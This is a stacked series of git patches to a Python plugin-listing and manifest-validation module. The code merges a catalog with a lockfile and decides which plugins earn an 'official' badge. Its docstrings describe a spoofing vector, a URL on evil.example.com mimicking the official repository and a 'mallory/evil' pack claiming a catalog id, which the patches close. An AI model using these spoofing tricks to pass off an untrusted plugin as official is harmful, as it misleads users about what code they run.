+    precisely so a later reader can tell the catalog's own pack from free
+    text that happens to carry the same id. Failing that, the id is reported
+    when the same provenance check the badge uses says this really is the
+    thing the catalog named -- which is what covers the built-in install that
+    records no ``catalog_id`` (its ``source`` IS the catalog id) and the
+    free-text install of the catalog's own repository. A foreign pack under a
+    catalog id gets ``None``.
     """
     recorded = (entry or {}).get("catalog_id")
     if isinstance(recorded, str) and recorded:
         return recorded
-    return plugin_id if plugin_id in catalog else None
+    return plugin_id if is_official(catalog.get(plugin_id), entry) else None
 
 
 def declared_capabilities(
@@ -533,20 +543,23 @@ def _repo_of(entry: dict[str, Any] | None) -> str | None:
     """``owner/repo`` as a lockfile entry recorded it, or ``None``.
 
     Derived from what the install wrote down, and only when it really is that
-    shape: the ``url`` first, because ``https://github.com/alice/extras`` can
-    only be read one way, then ``source``, which is ``alice/extras@v1`` for a
-    repository install and an absolute path for a linked directory -- and an
-    absolute path is not ``owner/repo`` in either operating system's
-    spelling. Anything else answers ``None`` rather than a guess.
+    shape: the ``url`` first, read by the same GitHub pattern the installer
+    parses a typed source with
+    (:func:`~app.core.plugins.sources.parse_github_url`), because the host is
+    half of what makes a URL that repository -- taking the last two path
+    segments of any URL at all would read
+    ``https://evil.example.com/CodefyUI/CodefyUI-Plugin-Self-Learning`` as
+    the repository the catalog vouches for. Then ``source``, which is
+    ``alice/extras@v1`` for a repository install and an absolute path for a
+    linked directory -- and an absolute path is not ``owner/repo`` in either
+    operating system's spelling. Anything else answers ``None`` rather than a
+    guess.
     """
     if entry is None:
         return None
-    url = _text(entry.get("url"))
-    if url:
-        tail = url.rstrip("/").removesuffix(".git")
-        owner_repo = "/".join(tail.split("/")[-2:])
-        if REPO_RE.match(owner_repo):
-            return owner_repo
+    owner_repo = parse_github_url(_text(entry.get("url")))
+    if owner_repo is not None:
+        return "/".join(owner_repo)
     source = _text(entry.get("source")).split("@", 1)[0]
     return source if REPO_RE.match(source) else None
 

--- a/backend/app/core/plugins/listing.py
+++ b/backend/app/core/plugins/listing.py
@@ -188,12 +188,15 @@ def declared_capabilities(
     shown as though the new list were consented to. The manifest is the
     fallback for a plugin nobody has installed yet -- and for a lockfile
     written before capabilities were recorded at all.
+
+    A RECORDED empty list is an answer, not a miss: "you granted this plugin
+    nothing" is exactly what an empty grant means, and falling through to the
+    manifest there would show an ungranted capability as though it had been
+    agreed to. Only a missing (or malformed) field asks the manifest.
     """
     granted = (entry or {}).get("capabilities")
     if isinstance(granted, list):
-        recorded = [item for item in granted if isinstance(item, str)]
-        if recorded:
-            return recorded
+        return [item for item in granted if isinstance(item, str)]
     return list(manifest_capabilities(manifest))
 
 
@@ -201,12 +204,11 @@ def declared_trusted_modules(
     entry: dict[str, Any] | None, manifest: dict[str, Any]
 ) -> list[str]:
     """The imports the AST gate was told to allow. Same rule as the
-    capabilities above: the lockfile's record first, the manifest second."""
+    capabilities above: a recorded list wins, empty or not; only a missing
+    one asks the manifest."""
     trusted = (entry or {}).get("trusted_modules")
     if isinstance(trusted, list):
-        recorded = [item for item in trusted if isinstance(item, str)]
-        if recorded:
-            return recorded
+        return [item for item in trusted if isinstance(item, str)]
     return manifest_allowed_modules(manifest)
 
 
@@ -326,7 +328,11 @@ def _entry_payload(
     job = _job_for(plugin_id, active_job)
     enabled = plugin_loader.is_enabled(entry) if entry is not None else False
     nodes = _nodes(plugin_id, row=row, entry=entry, registry=registry)
-    ref = _recorded(entry, "ref")
+    # What was installed beats what the catalog pins: a plugin installed off
+    # the default branch must not report the tag the catalog has moved on to.
+    # "" is the default branch on both sides, so an empty recorded ref is an
+    # answer rather than a miss.
+    ref = _text(entry.get("ref")) if entry is not None else (row.ref if row else "")
 
     return {
         "id": plugin_id,
@@ -343,7 +349,7 @@ def _entry_payload(
         "source_kind": _recorded(entry, "source_kind"),
         "source": _source(plugin_id, row=row, entry=entry),
         "repo": _repo(row=row, entry=entry),
-        "ref": ref if ref is not None else (row.ref if row else ""),
+        "ref": ref,
         "sha": _recorded(entry, "sha"),
         "url": _url(row=row, entry=entry),
         "homepage": (
@@ -536,9 +542,10 @@ def _job_for(
 def _recorded(entry: dict[str, Any] | None, key: str) -> str | None:
     """What the lockfile wrote down under *key*, or ``None``.
 
-    One spelling for the four fields that only an installed plugin has, so
-    that "not installed" and "installed but the field is empty" arrive as the
-    same ``None`` instead of as ``None`` in one field and ``""`` in the next.
+    One spelling for the three fields only an installed plugin has, so that
+    "not installed" and "installed but the field is empty" arrive as the same
+    ``None`` instead of as ``None`` in one field and ``""`` in the next. Not
+    used for ``ref``, where ``""`` is a real answer -- the default branch.
     """
     if entry is None:
         return None

--- a/backend/app/core/plugins/listing.py
+++ b/backend/app/core/plugins/listing.py
@@ -1,0 +1,562 @@
+"""What the Plugin Center draws: one row per plugin, installed or not.
+
+The panel asks one question -- "what can I have, and what do I have?" -- and
+the two halves of the answer come from two documents that do not know about
+each other. ``plugins/registry.json`` says what this build can install by
+name; the lockfile says what this install actually did. Neither is a superset
+of the other: a pack shipped by an update sits on disk uninstalled, and a
+plugin fetched from a URL nobody put in the catalog is installed with no
+catalog row at all.
+
+So the merge happens HERE, once, and produces rows of one shape. Every row
+carries every field, and a field a row cannot have is ``None`` or empty
+rather than absent -- a card renderer should never have to ask whether the
+key is there this time, and a TypeScript type should be able to say
+``string | null`` instead of ``string | undefined``. The rules that decide
+each field are in one file for the same reason the manifest rules are: the
+CLI's ``plugin list`` and the panel must not be able to disagree about which
+plugin is official, which one is missing its files, and which one the user
+threw away on purpose.
+
+What this module does NOT do: read a network, install anything, or format a
+sentence. ``status`` is a word for a caller to translate, and the two node
+sources -- the live registry for an installed pack, a source scan for one on
+disk that is not installed -- are both answers about names, never about code
+that has been imported.
+"""
+
+from __future__ import annotations
+
+import re
+from pathlib import Path
+from typing import Any
+
+from app.core import plugin_loader
+from app.core.node_registry import NodeRegistry
+
+from .catalog import CatalogEntry, catalog_entries
+from .manifest import (
+    REPO_RE,
+    manifest_allowed_modules,
+    manifest_capabilities,
+    manifest_has_frontend,
+    manifest_python_deps,
+)
+
+#: How a node announces its name. The same expression the catalog-honesty
+#: test scans packs with, deliberately: what the Plugin Center promises a
+#: pack contains and what that test proves a pack contains have to be the
+#: same list, or one of them is lying to a student whose palette is empty.
+_NODE_NAME_RE = re.compile(r"""NODE_NAME\s*=\s*["']([^"']+)["']""")
+
+#: Scanned node names, keyed by ``(directory, newest mtime in it)``. The key
+#: carries the mtime rather than a timestamp of its own so an edited pack is
+#: a MISS instead of a stale hit -- which is what a plugin author reloading
+#: their own pack needs. Small on purpose: this only ever holds the packs
+#: this build ships, and it is cleared wholesale rather than evicted, because
+#: an LRU for eight entries is more code than the scan it saves.
+_NODE_SCAN_CACHE: dict[tuple[str, float], tuple[str, ...]] = {}
+_NODE_SCAN_LIMIT = 32
+
+
+def provider_token(plugin_id: str) -> str:
+    """The ``cdui_plugins.<X>`` slot a pack's modules are imported under.
+
+    kebab to snake, because a hyphen cannot appear in a Python module path:
+    ``official-template`` is imported as ``cdui_plugins.official_template``.
+    """
+    return plugin_id.replace("-", "_")
+
+
+def nodes_for_plugin(plugin_id: str, registry: NodeRegistry) -> list[str]:
+    """The node names an installed plugin has REGISTERED, sorted.
+
+    Read off the live registry rather than off disk, so it answers what the
+    palette will actually offer: a disabled plugin has no nodes in there and
+    correctly reports none, and a node whose file failed to import is absent
+    from both.
+    """
+    prefix = f"cdui_plugins.{provider_token(plugin_id)}."
+    return sorted(
+        cls.NODE_NAME
+        for cls in registry.nodes.values()
+        if (cls.__module__ or "").startswith(prefix)
+    )
+
+
+def scan_node_names(nodes_dir: Path) -> list[str]:
+    """The node names a pack's sources declare, without importing them.
+
+    For a pack that is ON DISK but NOT INSTALLED there is nothing in the
+    registry to ask, and importing it to find out is exactly what installing
+    means -- the card has to say what the pack contains before the user
+    agrees to run any of it. So the names are read as text.
+
+    Never raises. An unreadable directory or a file in an encoding this
+    cannot decode answers "no names", because a Plugin Center that traces
+    back over one malformed pack is worse than one that undersells it.
+    """
+    try:
+        files = sorted(nodes_dir.glob("*.py"))
+        newest = max((path.stat().st_mtime for path in files), default=0.0)
+    except OSError:
+        return []
+
+    key = (str(nodes_dir), newest)
+    cached = _NODE_SCAN_CACHE.get(key)
+    if cached is not None:
+        return list(cached)
+
+    names: set[str] = set()
+    for path in files:
+        try:
+            text = path.read_text(encoding="utf-8")
+        except (OSError, UnicodeDecodeError):
+            continue
+        names.update(_NODE_NAME_RE.findall(text))
+
+    found = tuple(sorted(names))
+    if len(_NODE_SCAN_CACHE) >= _NODE_SCAN_LIMIT:
+        _NODE_SCAN_CACHE.clear()
+    _NODE_SCAN_CACHE[key] = found
+    return list(found)
+
+
+def frontend_entry_url(
+    plugin_id: str, plugin_dir: Path | None, manifest: dict[str, Any], *,
+    enabled: bool,
+) -> str | None:
+    """Where the editor loads this plugin's browser code from, or ``None``.
+
+    Three conditions, and all three are load-bearing: the manifest has to
+    declare an entry that stays inside ``frontend/``
+    (:func:`~app.core.plugin_loader.frontend_entry_rel` enforces that), the
+    file has to be THERE -- a manifest can name a bundle the author forgot to
+    build, and a URL to a missing file is a console error in the editor
+    rather than a message about a plugin -- and the plugin has to be enabled,
+    since a disabled plugin contributes no UI either.
+    """
+    if plugin_dir is None or not enabled:
+        return None
+    entry_rel = plugin_loader.frontend_entry_rel(manifest)
+    if not entry_rel or not (plugin_dir / entry_rel).is_file():
+        return None
+    return f"/plugins/{plugin_id}/{entry_rel}"
+
+
+def is_official(row: CatalogEntry | None) -> bool:
+    """Does CodefyUI vouch for this plugin?
+
+    True for anything the catalog ships as ``builtin`` -- a pack that arrived
+    with the release, through a pull request in this repository, is first
+    party by construction, which is the same reasoning
+    :func:`~app.core.plugins.inspect.inspect_builtin` states -- and for a
+    ``github`` row the catalog explicitly marks ``official``. Everything
+    else, including a plugin installed from a URL, is not.
+    """
+    return row is not None and (row.kind == "builtin" or row.official)
+
+
+def catalog_id_for(
+    plugin_id: str,
+    entry: dict[str, Any] | None,
+    catalog: dict[str, CatalogEntry],
+) -> str | None:
+    """The catalog row an installed plugin came from, or ``None``.
+
+    The recorded ``catalog_id`` wins: ``cdui plugin install <name>`` writes
+    it precisely so a later reader can tell the catalog's own pack from free
+    text that happens to carry the same id. A built-in install records none
+    (its ``source`` IS the catalog id), so the id is matched against the
+    catalog instead -- which is safe because the reserved-id rule refuses an
+    install that claims a catalog id from anywhere but the repository the
+    catalog names.
+    """
+    recorded = (entry or {}).get("catalog_id")
+    if isinstance(recorded, str) and recorded:
+        return recorded
+    return plugin_id if plugin_id in catalog else None
+
+
+def declared_capabilities(
+    entry: dict[str, Any] | None, manifest: dict[str, Any]
+) -> list[str]:
+    """The capabilities this plugin has been GRANTED, or asks for.
+
+    The lockfile wins for an installed plugin: it records what the user
+    agreed to, and a plugin that rewrote its manifest afterwards must not be
+    shown as though the new list were consented to. The manifest is the
+    fallback for a plugin nobody has installed yet -- and for a lockfile
+    written before capabilities were recorded at all.
+    """
+    granted = (entry or {}).get("capabilities")
+    if isinstance(granted, list):
+        recorded = [item for item in granted if isinstance(item, str)]
+        if recorded:
+            return recorded
+    return list(manifest_capabilities(manifest))
+
+
+def declared_trusted_modules(
+    entry: dict[str, Any] | None, manifest: dict[str, Any]
+) -> list[str]:
+    """The imports the AST gate was told to allow. Same rule as the
+    capabilities above: the lockfile's record first, the manifest second."""
+    trusted = (entry or {}).get("trusted_modules")
+    if isinstance(trusted, list):
+        recorded = [item for item in trusted if isinstance(item, str)]
+        if recorded:
+            return recorded
+    return manifest_allowed_modules(manifest)
+
+
+def installed_facts(
+    plugin_id: str,
+    entry: dict[str, Any],
+    manifest: dict[str, Any],
+    catalog: dict[str, CatalogEntry],
+) -> dict[str, Any]:
+    """The catalog-shaped fields ``GET /api/plugins`` reports per plugin.
+
+    Six keys the installed-plugin listing did not have and the Plugin Center
+    needs on every row it draws, computed by the same functions the catalog
+    listing uses -- so the panel cannot be told a plugin is official on one
+    route and unofficial on the other.
+    """
+    return {
+        "official": is_official(catalog.get(plugin_id)),
+        "catalog_id": catalog_id_for(plugin_id, entry, catalog),
+        "capabilities": declared_capabilities(entry, manifest),
+        "trusted_modules": declared_trusted_modules(entry, manifest),
+        "python_deps": manifest_python_deps(manifest),
+        "has_frontend": manifest_has_frontend(manifest),
+    }
+
+
+def catalog_listing(
+    lockfile: dict[str, Any],
+    *,
+    registry: NodeRegistry,
+    active_job: dict[str, Any] | None = None,
+    remote_install_allowed: bool,
+    generation: int,
+) -> dict[str, Any]:
+    """Every plugin this install can have or does have, in one payload.
+
+    ``entries`` is the catalog in the order ``registry.json`` writes it --
+    that order is curated, teaching packs before tools -- followed by every
+    lockfile entry the catalog does not know about, sorted by id. The three
+    envelope fields are passed in rather than read here: whether a remote
+    install is allowed is a question about the ROUTER's gate, the reload
+    generation is the counter the editor polls, and the active job belongs to
+    whatever is running the install. This module answers about plugins.
+    """
+    catalog = catalog_entries()
+    installed = lockfile.get("plugins")
+    installed = installed if isinstance(installed, dict) else {}
+    tombstones = plugin_loader.removed_ids(lockfile)
+    dirs = dict(
+        plugin_loader.iter_plugin_dirs(
+            plugin_loader.plugins_builtin_root(),
+            plugin_loader.plugins_user_root(),
+            lockfile,
+            include_disabled=True,
+        )
+    )
+
+    entries = [
+        _entry_payload(
+            plugin_id,
+            row=row,
+            entry=_entry_of(installed, plugin_id),
+            plugin_dir=dirs.get(plugin_id),
+            tombstoned=plugin_id in tombstones,
+            registry=registry,
+            active_job=active_job,
+        )
+        for plugin_id, row in catalog.items()
+    ]
+    entries.extend(
+        _entry_payload(
+            plugin_id,
+            row=None,
+            entry=_entry_of(installed, plugin_id),
+            plugin_dir=dirs.get(plugin_id),
+            tombstoned=plugin_id in tombstones,
+            registry=registry,
+            active_job=active_job,
+        )
+        for plugin_id in sorted(set(installed) - set(catalog))
+    )
+
+    return {
+        "entries": entries,
+        "active_job": active_job,
+        "remote_install_allowed": remote_install_allowed,
+        "generation": generation,
+    }
+
+
+def _entry_of(installed: dict[str, Any], plugin_id: str) -> dict[str, Any] | None:
+    """This install's lockfile record for *plugin_id*, or ``None``."""
+    entry = installed.get(plugin_id)
+    return entry if isinstance(entry, dict) else None
+
+
+def _entry_payload(
+    plugin_id: str,
+    *,
+    row: CatalogEntry | None,
+    entry: dict[str, Any] | None,
+    plugin_dir: Path | None,
+    tombstoned: bool,
+    registry: NodeRegistry,
+    active_job: dict[str, Any] | None,
+) -> dict[str, Any]:
+    """One row. See the module docstring for what the shape promises."""
+    manifest = _manifest_for(plugin_id, row=row, plugin_dir=plugin_dir)
+    plugin_meta = _table(manifest.get("plugin"))
+    if not plugin_meta and entry is not None:
+        # A plugin whose files are gone still has the ``[plugin]`` table the
+        # install recorded. Showing that beats showing the bare id for a row
+        # whose whole point is to say "this is missing".
+        plugin_meta = _table(entry.get("manifest"))
+    lessons_meta = _table(manifest.get("lessons"))
+
+    job = _job_for(plugin_id, active_job)
+    enabled = plugin_loader.is_enabled(entry) if entry is not None else False
+    nodes = _nodes(plugin_id, row=row, entry=entry, registry=registry)
+    ref = _recorded(entry, "ref")
+
+    return {
+        "id": plugin_id,
+        "name": _text(plugin_meta.get("name")) or (row.name if row else plugin_id),
+        "description": (
+            _text(plugin_meta.get("description"))
+            or (row.description if row else "")
+        ),
+        "kind": row.kind if row else "external",
+        "official": is_official(row),
+        "status": _status(
+            entry=entry, plugin_dir=plugin_dir, tombstoned=tombstoned, job=job
+        ),
+        "source_kind": _recorded(entry, "source_kind"),
+        "source": _source(plugin_id, row=row, entry=entry),
+        "repo": _repo(row=row, entry=entry),
+        "ref": ref if ref is not None else (row.ref if row else ""),
+        "sha": _recorded(entry, "sha"),
+        "url": _url(row=row, entry=entry),
+        "homepage": (
+            _text(plugin_meta.get("homepage")) or (row.homepage if row else "")
+        ),
+        "version": _text(plugin_meta.get("version")) or None,
+        "installed_at": _recorded(entry, "installed_at"),
+        "enabled": enabled,
+        "chapters": (
+            _strings(lessons_meta.get("chapters"))
+            or list(row.chapters if row else ())
+        ),
+        "lessons": _strings(lessons_meta.get("lessons")),
+        "tags": list(row.tags) if row else [],
+        "nodes": nodes,
+        "node_count": len(nodes),
+        "capabilities": declared_capabilities(entry, manifest),
+        "trusted_modules": declared_trusted_modules(entry, manifest),
+        "python_deps": manifest_python_deps(manifest),
+        "has_frontend": manifest_has_frontend(manifest),
+        "consent_required": _consent_required(row=row, entry=entry),
+        "frontend_entry": frontend_entry_url(
+            plugin_id, plugin_dir, manifest, enabled=enabled
+        ),
+        "job": job,
+    }
+
+
+def _status(
+    *,
+    entry: dict[str, Any] | None,
+    plugin_dir: Path | None,
+    tombstoned: bool,
+    job: dict[str, Any] | None,
+) -> str:
+    """The one word the card's pill shows.
+
+    Order is the whole rule. A job in flight outranks everything, because
+    what the row is DOING is more useful than what it was. Then the lockfile:
+    an entry with no directory is ``missing_files`` -- the state a moved
+    checkout or a half-finished uninstall leaves, and the one that used to
+    render as a normal installed row whose nodes had all silently vanished.
+    Only for a plugin with no entry at all does the tombstone matter, and
+    there it is the difference between "you removed this" and "you have never
+    had this", which is the difference between a Reinstall button and an
+    Install one.
+    """
+    if job is not None:
+        return "installing"
+    if entry is None:
+        return "removed" if tombstoned else "available"
+    if plugin_dir is None:
+        return "missing_files"
+    return "installed" if plugin_loader.is_enabled(entry) else "disabled"
+
+
+def _manifest_for(
+    plugin_id: str, *, row: CatalogEntry | None, plugin_dir: Path | None
+) -> dict[str, Any]:
+    """The manifest behind a row, or ``{}`` when there is nothing to read.
+
+    An installed plugin's manifest is read where it is installed. A built-in
+    pack that is NOT installed still ships in this release, so its manifest
+    is read from the built-in root -- that is what lets an uninstalled pack's
+    card show its version, its lessons and what it would install. A ``github``
+    row that is not installed has nothing on this disk, and nothing may be
+    fetched to find out: a listing that reached the network would turn
+    drawing a panel into eight HTTP requests.
+    """
+    if plugin_dir is not None:
+        return plugin_loader.read_manifest_safe(plugin_dir)
+    if row is not None and row.kind == "builtin":
+        return plugin_loader.read_manifest_safe(
+            plugin_loader.plugins_builtin_root() / plugin_id
+        )
+    return {}
+
+
+def _nodes(
+    plugin_id: str,
+    *,
+    row: CatalogEntry | None,
+    entry: dict[str, Any] | None,
+    registry: NodeRegistry,
+) -> list[str]:
+    """What this plugin puts in the palette, by whichever means can say."""
+    if entry is not None:
+        return nodes_for_plugin(plugin_id, registry)
+    if row is not None and row.kind == "builtin":
+        return scan_node_names(
+            plugin_loader.plugins_builtin_root() / plugin_id / "nodes"
+        )
+    return []
+
+
+def _source(
+    plugin_id: str, *, row: CatalogEntry | None, entry: dict[str, Any] | None
+) -> str:
+    """What this plugin was (or would be) installed FROM.
+
+    The lockfile's own word for an installed plugin. For one that is not
+    installed it is what the install would record: the id for a built-in
+    pack, ``owner/repo`` (with ``@ref`` when the catalog pins one) for a
+    repository -- so a row's ``source`` reads the same before and after.
+    """
+    if entry is not None:
+        return _text(entry.get("source")) or plugin_id
+    if row is not None and row.kind == "github" and row.repo:
+        return f"{row.repo}@{row.ref}" if row.ref else row.repo
+    return plugin_id
+
+
+def _repo(*, row: CatalogEntry | None, entry: dict[str, Any] | None) -> str | None:
+    """``owner/repo``: what this install came from, else what the catalog says.
+
+    In that order, and the same order :func:`_url` uses, so the two fields
+    cannot describe two different repositories on one row. They do disagree
+    in real lockfiles -- a plugin installed from a fork, or from an owner the
+    project has since moved away from -- and when they do, the repository the
+    files actually came from is the one worth showing.
+    """
+    installed = _repo_of(entry)
+    if installed is not None:
+        return installed
+    return row.repo if row is not None and row.kind == "github" else None
+
+
+def _url(
+    *, row: CatalogEntry | None, entry: dict[str, Any] | None
+) -> str | None:
+    """The repository this came from, when it came from one."""
+    if entry is not None and _text(entry.get("url")):
+        return _text(entry.get("url"))
+    if row is not None and row.kind == "github" and row.repo:
+        return f"https://github.com/{row.repo}"
+    return None
+
+
+def _repo_of(entry: dict[str, Any] | None) -> str | None:
+    """``owner/repo`` as a lockfile entry recorded it, or ``None``.
+
+    Derived from what the install wrote down, and only when it really is that
+    shape: the ``url`` first, because ``https://github.com/alice/extras`` can
+    only be read one way, then ``source``, which is ``alice/extras@v1`` for a
+    repository install and an absolute path for a linked directory -- and an
+    absolute path is not ``owner/repo`` in either operating system's
+    spelling. Anything else answers ``None`` rather than a guess.
+    """
+    if entry is None:
+        return None
+    url = _text(entry.get("url"))
+    if url:
+        tail = url.rstrip("/").removesuffix(".git")
+        owner_repo = "/".join(tail.split("/")[-2:])
+        if REPO_RE.match(owner_repo):
+            return owner_repo
+    source = _text(entry.get("source")).split("@", 1)[0]
+    return source if REPO_RE.match(source) else None
+
+
+def _consent_required(
+    *, row: CatalogEntry | None, entry: dict[str, Any] | None
+) -> bool:
+    """Would installing this ask the user to trust a third party?
+
+    True for anything that comes out of a repository, false for a pack that
+    ships in this release and for a directory the user linked themselves --
+    the same split ``inspect`` makes, and for the same reason: a built-in
+    pack arrived through a pull request here, and a local link is the
+    author's own working tree.
+    """
+    if row is not None and row.kind == "github":
+        return True
+    return entry is not None and entry.get("source_kind") == "github_url"
+
+
+def _job_for(
+    plugin_id: str, active_job: dict[str, Any] | None
+) -> dict[str, Any] | None:
+    """The running job's progress, but only on the row it belongs to."""
+    if not active_job or active_job.get("plugin_id") != plugin_id:
+        return None
+    return {
+        "job_id": active_job.get("job_id"),
+        "status": active_job.get("status"),
+        "current_step": active_job.get("current_step"),
+    }
+
+
+def _recorded(entry: dict[str, Any] | None, key: str) -> str | None:
+    """What the lockfile wrote down under *key*, or ``None``.
+
+    One spelling for the four fields that only an installed plugin has, so
+    that "not installed" and "installed but the field is empty" arrive as the
+    same ``None`` instead of as ``None`` in one field and ``""`` in the next.
+    """
+    if entry is None:
+        return None
+    return _text(entry.get(key)) or None
+
+
+def _table(value: Any) -> dict[str, Any]:
+    """*value* when it is a table, else an empty one."""
+    return value if isinstance(value, dict) else {}
+
+
+def _text(value: Any) -> str:
+    """*value* when it is a string, else the empty string."""
+    return value if isinstance(value, str) else ""
+
+
+def _strings(value: Any) -> list[str]:
+    """The string members of *value* when it is a list, else empty."""
+    if not isinstance(value, list):
+        return []
+    return [item for item in value if isinstance(item, str)]

--- a/backend/app/core/plugins/listing.py
+++ b/backend/app/core/plugins/listing.py
@@ -152,14 +152,17 @@ def is_official(row: CatalogEntry | None, entry: dict[str, Any] | None) -> bool:
     """Does CodefyUI vouch for THIS plugin -- not just for this id?
 
     The badge is a claim about provenance, so matching the catalog by id is
-    not enough to earn it. An id is only reserved against a foreign install
-    when this build owns it outright (a route, or a pack that ships here);
-    the ids of the catalog's ``github`` rows are deliberately NOT reserved,
-    because the author of an official plugin has to be able to install their
-    own repository under its own id. That leaves a hole an id-only rule falls
-    straight into: install ``mallory/evil``, whose manifest says
-    ``id = "self-learning"``, and the row would wear the official badge over
-    a ``repo`` field reading ``mallory/evil``.
+    not enough to earn it. An id is only reserved OUTRIGHT when this build
+    owns it (a route, or a pack that ships here); the id of a catalog
+    ``github`` row is reserved to the repository the catalog names it with
+    (:func:`~app.core.plugins.catalog.reserved_id_holder`), because the
+    author of an official plugin has to be able to install their own
+    repository under its own id -- and that is a rule the INSTALLER applies,
+    not a fact about the lockfile in front of us. A lockfile can hold
+    ``id = "self-learning"`` over ``mallory/evil`` anyway: written by a build
+    older than the rule, hand-edited, or linked from a local working tree,
+    which is allowed under any catalog id. An id-only badge would light up
+    for all three, over a ``repo`` field reading ``mallory/evil``.
 
     So a row is official when the catalog vouches for it AND the install in
     front of us really is the thing the catalog named:
@@ -210,11 +213,12 @@ def catalog_id_for(
     """The catalog row an installed plugin came from, or ``None``.
 
     Matching the id against the catalog says only that this row LINES UP with
-    that entry -- it is not a reserved-id rule, because the ids of the
-    catalog's ``github`` rows deliberately are not reserved (see
-    :func:`is_official`), so a pack fetched from anywhere at all can arrive
-    carrying ``id = "self-learning"``. Answering ``self-learning`` for that
-    one would point the panel at a catalog card describing different code.
+    that entry. It is not the reserved-id rule: that one is applied by the
+    INSTALLER (see :func:`is_official`), and this reads a lockfile, which can
+    hold ``id = "self-learning"`` over anything at all -- a local link, a
+    hand-edited entry, an install older than the rule. Answering
+    ``self-learning`` for one of those would point the panel at a catalog
+    card describing different code.
 
     So the id is reported only when the install can be tied to the row. The
     recorded ``catalog_id`` wins: ``cdui plugin install <name>`` writes it
@@ -532,9 +536,9 @@ def _repo(*, row: CatalogEntry | None, entry: dict[str, Any] | None) -> str | No
     honest answer for a plugin linked from a local directory and for one
     installed from a URL on a host that is not GitHub. Falling through to the
     catalog for those printed the OFFICIAL repository beside a pack that had
-    never been near it: the id of a ``github`` catalog row is deliberately
-    not reserved (see :func:`is_official`), so anything at all can be
-    installed under one.
+    never been near it: a lockfile can hold anything at all under a catalog
+    ``github`` id (see :func:`is_official`), so the row's own repository is
+    never an answer about what is installed.
 
     :func:`_url` splits the same way, so the two fields on a row always
     describe the same install rather than one each.

--- a/backend/app/core/plugins/manifest.py
+++ b/backend/app/core/plugins/manifest.py
@@ -1,0 +1,178 @@
+"""``cdui.plugin.toml``: reading one, and refusing the ones we will not run.
+
+A manifest is HAND-WRITTEN, by a plugin author who cannot see what the
+installer does with it, so every check here exists because a wrong shape once
+failed in the wrong direction rather than because a schema wanted to be
+complete. ``allowed_modules = "os"`` reaching ``frozenset("os")`` -- which is
+``{"o", "s"}`` -- is the shape that named this module's rule: say what is
+wrong with the file, at the point it is read, instead of granting nothing and
+failing much later somewhere that blames the wrong line.
+
+The reader (:func:`read_manifest`) and the accessors below never validate,
+and :func:`validate_manifest` never reads a file. That split is what lets a
+route show a manifest it has refused: the GUI wants to say "this plugin asks
+for the network and its id is invalid", which needs the parsed table and the
+refusal at the same time.
+
+Nothing here formats a message for a human. ``ManifestError``'s text is
+English and one line -- the CLI and the routes each have their own way of
+telling the user, and neither wants the other's.
+"""
+
+from __future__ import annotations
+
+import re
+import sys
+from pathlib import Path
+from typing import Any
+
+from app.core.plugin_loader import MANIFEST_FILENAME
+from app.core.security_tiers import (
+    CAPABILITIES,
+    normalize_capabilities,
+    unknown_capabilities,
+)
+
+from .errors import ManifestError
+
+if sys.version_info >= (3, 11):
+    import tomllib
+else:
+    import tomli as tomllib  # 3.10 backport -- same API.
+
+#: A plugin id is a directory name, a URL segment and a Python-ish namespace
+#: component all at once, so it is deliberately narrower than any of them.
+PLUGIN_ID_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$")
+
+#: The one ``[plugin].schema_version`` this build knows how to install.
+SUPPORTED_SCHEMA = 1
+
+
+def read_manifest(plugin_root: Path) -> dict[str, Any]:
+    """Parse ``<plugin_root>/cdui.plugin.toml``.
+
+    Raises ``FileNotFoundError`` when there is no manifest and
+    ``tomllib.TOMLDecodeError`` when there is one that is not TOML. Neither is
+    turned into a :class:`~.errors.ManifestError`: "there is no file" and
+    "the file is not TOML" are answers about the DISK, and a caller that
+    catches them separately (the CLI does) can say something better than
+    "invalid manifest".
+    """
+    p = plugin_root / MANIFEST_FILENAME
+    if not p.exists():
+        raise FileNotFoundError(f"Manifest not found at {p}")
+    return tomllib.loads(p.read_text(encoding="utf-8"))
+
+
+def validate_manifest(m: dict[str, Any]) -> None:
+    """Refuse a manifest this build will not install. Returns None or raises.
+
+    Only the parts something ACTS on: the ``[plugin]`` table (without which
+    there is no id to install under), the schema version, the id itself, and
+    ``[security]``. Everything else in a manifest is metadata that a wrong
+    value only makes ugly.
+    """
+    plugin = m.get("plugin")
+    if not isinstance(plugin, dict):
+        raise ManifestError("Manifest is missing required [plugin] table.")
+    schema_version = plugin.get("schema_version")
+    if schema_version != SUPPORTED_SCHEMA:
+        raise ManifestError(
+            f"Unsupported plugin schema_version: {schema_version!r}. "
+            "Upgrade cdui or use an older plugin release."
+        )
+    plugin_id = plugin.get("id", "")
+    if not PLUGIN_ID_RE.match(plugin_id):
+        raise ManifestError(
+            f"Invalid plugin id: {plugin_id!r}. "
+            "Must match ^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?$"
+        )
+    _validate_security_table(m.get("security"))
+
+
+def _validate_security_table(security: Any) -> None:
+    """Check ``[security]`` before anything acts on it.
+
+    Both keys are lists of strings, and a wrong shape used to fail silently in
+    the worst possible direction: ``allowed_modules = "os"`` reaches
+    ``frozenset("os")``, which is ``{"o", "s"}``, which grants nothing and
+    unlocks nothing while printing "Plugin requests non-default modules: o, s".
+    A manifest is hand-written; say what is wrong with it.
+
+    An unknown capability is an error rather than a no-op. It is either a typo
+    or a manifest written against a newer CodefyUI, and granting nothing then
+    failing at the import would blame the wrong line.
+    """
+    if security is None:
+        return
+    if not isinstance(security, dict):
+        raise ManifestError("[security] must be a table.")
+    for key in ("allowed_modules", "capabilities"):
+        value = security.get(key)
+        if value is None:
+            continue
+        if not isinstance(value, list) or not all(isinstance(v, str) for v in value):
+            raise ManifestError(
+                f"[security].{key} must be a list of strings, got {value!r}."
+            )
+    unknown = unknown_capabilities(security.get("capabilities"))
+    if unknown:
+        raise ManifestError(
+            f"Unknown capability in [security].capabilities: "
+            f"{', '.join(unknown)}. This build knows: {', '.join(CAPABILITIES)}."
+        )
+
+
+def manifest_capabilities(manifest: dict[str, Any]) -> tuple[str, ...]:
+    """The normalised ``[security].capabilities`` a manifest declares."""
+    security = manifest.get("security")
+    if not isinstance(security, dict):
+        return ()
+    return normalize_capabilities(security.get("capabilities"))
+
+
+def manifest_allowed_modules(manifest: dict[str, Any]) -> list[str]:
+    """The ``[security].allowed_modules`` a manifest asks to import.
+
+    A list rather than a tuple because that is what the AST gate and the
+    lockfile writer both want, and a fresh one each call because callers pass
+    it straight into ``validate_plugin_dir``.
+
+    Answers ``[]`` for every shape that is not a list of strings.
